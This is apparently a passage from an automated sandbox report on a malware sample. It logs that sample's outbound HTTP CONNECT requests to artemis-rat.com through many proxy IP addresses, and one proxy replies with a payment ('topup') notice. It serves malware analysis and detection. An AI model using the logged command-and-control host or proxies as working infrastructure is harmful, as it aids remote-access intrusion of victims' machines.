                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.342081070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.514656067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514803886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2070192.168.2.55233737.187.77.58598703876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.273166895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.014292002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.014746904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014609098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2071192.168.2.5554748.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.280672073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2072192.168.2.55433075.89.101.62803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.281331062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2073192.168.2.555221193.239.58.9280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.281975031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2074192.168.2.55546736.93.157.4956783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.282391071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2075192.168.2.55547245.11.95.16552123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.284962893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2076192.168.2.55547345.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.286489964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2077192.168.2.55547531.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.316241026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2078192.168.2.55434388.202.230.10388963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.317468882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.342178106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2079192.168.2.55527593.190.142.57265413876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.332149982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.628355026 CET226INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:48 GMT
                                                                                                                                                                                                                                                            Content-Length: 101
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2080192.168.2.55547837.221.197.165803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.341423035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.207223892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202048063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.092732906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.889710903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2081192.168.2.555476123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.364264011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2082192.168.2.555300190.97.238.949993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.372075081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.405121088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.202069998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.202070951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.202024937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.092804909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.904939890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2089192.168.2.554510184.170.249.6541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.424830914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2090192.168.2.554388148.72.206.84347613876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.440530062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.592406988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702194929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.702574015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2091192.168.2.555136142.54.229.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.733339071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2092192.168.2.55548144.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.820817947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2093192.168.2.554376196.0.113.10568613876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.824078083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014228106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.014431000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.014513969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2094192.168.2.55547164.227.108.25319083876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.826883078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2095192.168.2.55516965.169.38.73265923876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.843770027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2096192.168.2.554360106.105.218.244803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.870424032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905112028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998819113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.092752934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2097192.168.2.552491104.248.151.220636483876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.870474100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.905092001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.998819113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:01.092752934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
